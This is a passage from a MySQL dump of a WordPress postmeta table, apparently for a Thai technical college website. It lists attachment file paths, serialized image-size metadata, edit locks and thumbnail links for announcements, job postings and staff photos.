:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29445, 12001, '_wp_attached_file', '2021/07/koshvl6f-1.jpg'),
(29446, 12001, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1250;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2021/07/koshvl6f-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"koshvl6f-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"koshvl6f-1-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"koshvl6f-1-768x307.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"koshvl6f-1-1024x410.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"koshvl6f-1-400x160.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29447, 12003, '_edit_lock', '1629448942:12'),
(29448, 12003, '_edit_last', '14'),
(29449, 12003, '_thumbnail_id', '12000'),
(29452, 12003, '_hide_featured', NULL),
(29453, 12006, '_wp_attached_file', '2021/07/วันแม่.jpg'),
(29454, 12007, '_wp_attached_file', '2021/07/วันแม่-1.jpg'),
(29455, 12012, '_wp_attached_file', '2021/07/236838655_148142904132783_7236920513099647033_n.jpg'),
(29456, 12012, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1241;s:6:\"height\";i:1755;s:4:\"file\";s:59:\"2021/07/236838655_148142904132783_7236920513099647033_n.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"236838655_148142904132783_7236920513099647033_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"236838655_148142904132783_7236920513099647033_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"236838655_148142904132783_7236920513099647033_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"236838655_148142904132783_7236920513099647033_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"236838655_148142904132783_7236920513099647033_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29457, 12014, '_wp_attached_file', '2021/07/Untitled-2-Recovered.jpg'),
(29458, 12014, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3402;s:6:\"height\";i:1701;s:4:\"file\";s:32:\"2021/07/Untitled-2-Recovered.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Untitled-2-Recovered-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Untitled-2-Recovered-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"Untitled-2-Recovered-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"Untitled-2-Recovered-400x200.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29470, 901, '_edit_lock', '1629446583:12'),
(29471, 902, '_edit_lock', '1629446523:12'),
(29487, 12029, '_edit_lock', '1629469354:12'),
(29488, 12029, '_edit_last', '12'),
(29491, 12029, '_hide_featured', NULL),
(29500, 12029, '_thumbnail_id', '12014'),
(29507, 12038, '_edit_lock', '1629450235:12'),
(29508, 12038, '_edit_last', '12'),
(29509, 12039, '_wp_attached_file', '2021/08/OTour.png'),
(29510, 12039, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:641;s:6:\"height\";i:408;s:4:\"file\";s:17:\"2021/08/OTour.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"OTour-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"OTour-300x191.png\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"OTour-400x255.png\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29511, 12038, '_thumbnail_id', '12012'),
(29512, 12038, '_hide_featured', NULL),
(29525, 12038, '_wp_old_slug', '%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%aa%e0%b8%b3%e0%b8%99%e0%b8%b6%e0%b8%81%e0%b9%83%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9b%e0%b9%87%e0%b8%99'),
(29526, 12012, '_cg_img_link', 'https://docs.google.com/forms/d/e/1FAIpQLSexJemyq2C3aUv4FhWyIY9fLOhY09G3zFUYS2UfZ7lFjeqVfA/viewform'),
(29527, 12012, '_cg_link_target', '_self'),
(29537, 12047, '_wp_attached_file', '2021/08/2000.png'),
(29538, 12047, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1047;s:6:\"height\";i:590;s:4:\"file\";s:16:\"2021/08/2000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"2000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"2000-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"2000-768x433.png\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"2000-1024x577.png\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:16:\"2000-400x225.png\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29549, 12047, '_cg_img_link', 'https://www.youtube.com/watch?v=R3CRSR4YN9Q'),
(29550, 12047, '_cg_link_target', '_self'),
(29585, 12068, '_wp_attached_file', '2021/07/S__3915907.jpg'),
(29586, 12068, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1522;s:6:\"height\";i:1076;s:4:\"file\";s:22:\"2021/07/S__3915907.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"S__3915907-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"S__3915907-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"S__3915907-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"S__3915907-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"S__3915907-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29587, 12070, '_edit_lock', '1629703417:14'),
(29588, 12070, '_edit_last', '14'),
(29589, 12071, '_wp_attached_file', '2021/08/วิทยาลัยเทคนิคระยองรายงานการประเมินตนเอง-ประจำปีการศึกษา-2563.pdf'),
(29590, 12072, '_edit_lock', '1629703305:14'),
(29591, 12072, '_edit_last', '14'),
(29592, 12072, '_hide_featured', NULL),
(29593, 12083, '_edit_lock', '1631176094:14'),
(29594, 12083, '_edit_last', '14'),
(29595, 12084, '_wp_attached_file', '2021/08/310864รับสมัคร-จนท.การเงินและพัสดุ.pdf'),
(29598, 12083, '_hide_featured', NULL),
(29605, 12086, '_edit_lock', '1630548961:14'),
(29606, 12086, '_edit_last', '14'),
(29607, 12087, '_wp_attached_file', '2021/09/ผลการประเมิน.pdf'),
(29608, 12086, '_hide_featured', NULL),
(29609, 12093, '_edit_lock', '1631176094:14'),
(29610, 12093, '_edit_last', '14'),
(29611, 12094, '_wp_attached_file', '2021/09/090964ประกาศรายชื่อผู้สิทธิสอบ.pdf'),
(29614, 12093, '_hide_featured', NULL),
(29620, 12098, '_edit_lock', '1632326174:14'),
(29621, 12098, '_edit_last', '14'),
(29622, 12099, '_wp_attached_file', '2021/07/178011.jpg'),
(29623, 12099, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:18:\"2021/07/178011.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"178011-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"178011-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"178011-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"178011-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"178011-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29625, 12102, '_edit_lock', '1632326850:14'),
(29626, 12102, '_edit_last', '14'),
(29627, 12103, '_wp_attached_file', '2021/09/03AW_เกษตรอาชีวะ-Poster-2481x3508F-01.jpg'),
(29628, 12103, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1449;s:6:\"height\";i:2048;s:4:\"file\";s:71:\"2021/09/03AW_เกษตรอาชีวะ-Poster-2481x3508F-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:71:\"03AW_เกษตรอาชีวะ-Poster-2481x3508F-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:71:\"03AW_เกษตรอาชีวะ-Poster-2481x3508F-01-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:72:\"03AW_เกษตรอาชีวะ-Poster-2481x3508F-01-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:72:\"03AW_เกษตรอาชีวะ-Poster-2481x3508F-01-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:71:\"03AW_เกษตรอาชีวะ-Poster-2481x3508F-01-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29629, 12102, '_thumbnail_id', '12103'),
(29632, 12102, '_hide_featured', NULL);
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(29635, 12105, '_edit_lock', '1639722377:1'),
(29636, 12105, '_edit_last', '14'),
(29637, 12105, '_thumbnail_id', '12099'),
(29640, 12105, '_hide_featured', NULL),
(29641, 12108, '_edit_lock', '1633658940:14'),
(29642, 12108, '_edit_last', '14'),
(29643, 12109, '_wp_attached_file', '2021/10/ประกาศรับ-จนท.สื่อและห้องสมุด.pdf'),
(29646, 12108, '_hide_featured', NULL),
(29649, 12111, '_wp_attached_file', '2021/07/Untitled-1.png'),
(29650, 12111, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:945;s:6:\"height\";i:472;s:4:\"file\";s:22:\"2021/07/Untitled-1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-1-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-400x200.png\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29651, 12112, '_edit_lock', '1634279407:14'),
(29652, 12112, '_edit_last', '14'),
(29653, 12113, '_wp_attached_file', '2021/10/ประกาศลงทะเบียน2-2564.pdf'),
(29656, 12112, '_hide_featured', NULL),
(29659, 12118, '_edit_lock', '1635131425:14'),
(29660, 12118, '_edit_last', '14'),
(29661, 12119, '_wp_attached_file', '2021/10/รายชื่อสอบเจ้าหน้าที่.pdf'),
(29664, 12118, '_hide_featured', NULL),
(29675, 12122, '_edit_lock', '1635317836:14'),
(29676, 12122, '_edit_last', '14'),
(29677, 12123, '_wp_attached_file', '2021/10/ประกาศรายชื่องานห้องสมุด.pdf'),
(29680, 12122, '_hide_featured', NULL),
(29689, 12125, '_wp_attached_file', '2021/07/Untitled-1-1.png'),
(29690, 12125, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:945;s:6:\"height\";i:472;s:4:\"file\";s:24:\"2021/07/Untitled-1-1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-400x200.png\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29691, 12127, '_edit_lock', '1635473802:14'),
(29692, 12127, '_edit_last', '14'),
(29693, 12128, '_wp_attached_file', '2021/10/รับสมัครเจ้าหน้าที่งานสื่อ.pdf'),
(29696, 12127, '_hide_featured', NULL),
(29699, 12130, '_edit_lock', '1637568944:14'),
(29700, 12130, '_edit_last', '14'),
(29701, 12131, '_wp_attached_file', '2021/10/รับสมัครครูพิเศษสอน.pdf'),
(29704, 12130, '_hide_featured', NULL),
(29720, 12143, '_wp_attached_file', '2021/11/20211101150514944.pdf'),
(29721, 12143, '_edit_lock', '1635832847:14'),
(29722, 12144, '_edit_lock', '1636726045:14'),
(29723, 12144, '_edit_last', '14'),
(29726, 12144, '_hide_featured', NULL),
(29733, 12149, '_wp_attached_file', '2021/11/นายชาคริต-รุ่งรัตน์.jpg'),
(29734, 12149, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:383;s:6:\"height\";i:471;s:4:\"file\";s:67:\"2021/11/นายชาคริต-รุ่งรัตน์.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:67:\"นายชาคริต-รุ่งรัตน์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:67:\"นายชาคริต-รุ่งรัตน์-244x300.jpg\";s:5:\"width\";i:244;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:67:\"นายชาคริต-รุ่งรัตน์-244x300.jpg\";s:5:\"width\";i:244;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29736, 12149, '_wp_attachment_image_alt', 'นายชาคริต รุ่งรัตน์'),
(29738, 12151, '_wp_attached_file', '2021/11/Untitled-1-1.jpg'),
(29739, 12151, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:24:\"2021/11/Untitled-1-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-1-1-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29740, 12154, '_wp_attached_file', '2018/01/รองอา.jpg'),
(29741, 12154, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1668;s:6:\"height\";i:2226;s:4:\"file\";s:27:\"2018/01/รองอา.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"รองอา-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"รองอา-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"รองอา-768x1025.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"รองอา-767x1024.jpg\";s:5:\"width\";i:767;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"รองอา-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29746, 12156, '_wp_attached_file', '2018/10/รองชรินทร์.jpg'),
(29747, 12156, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1668;s:6:\"height\";i:2226;s:4:\"file\";s:42:\"2018/10/รองชรินทร์.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"รองชรินทร์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"รองชรินทร์-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"รองชรินทร์-768x1025.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:43:\"รองชรินทร์-767x1024.jpg\";s:5:\"width\";i:767;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:42:\"รองชรินทร์-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8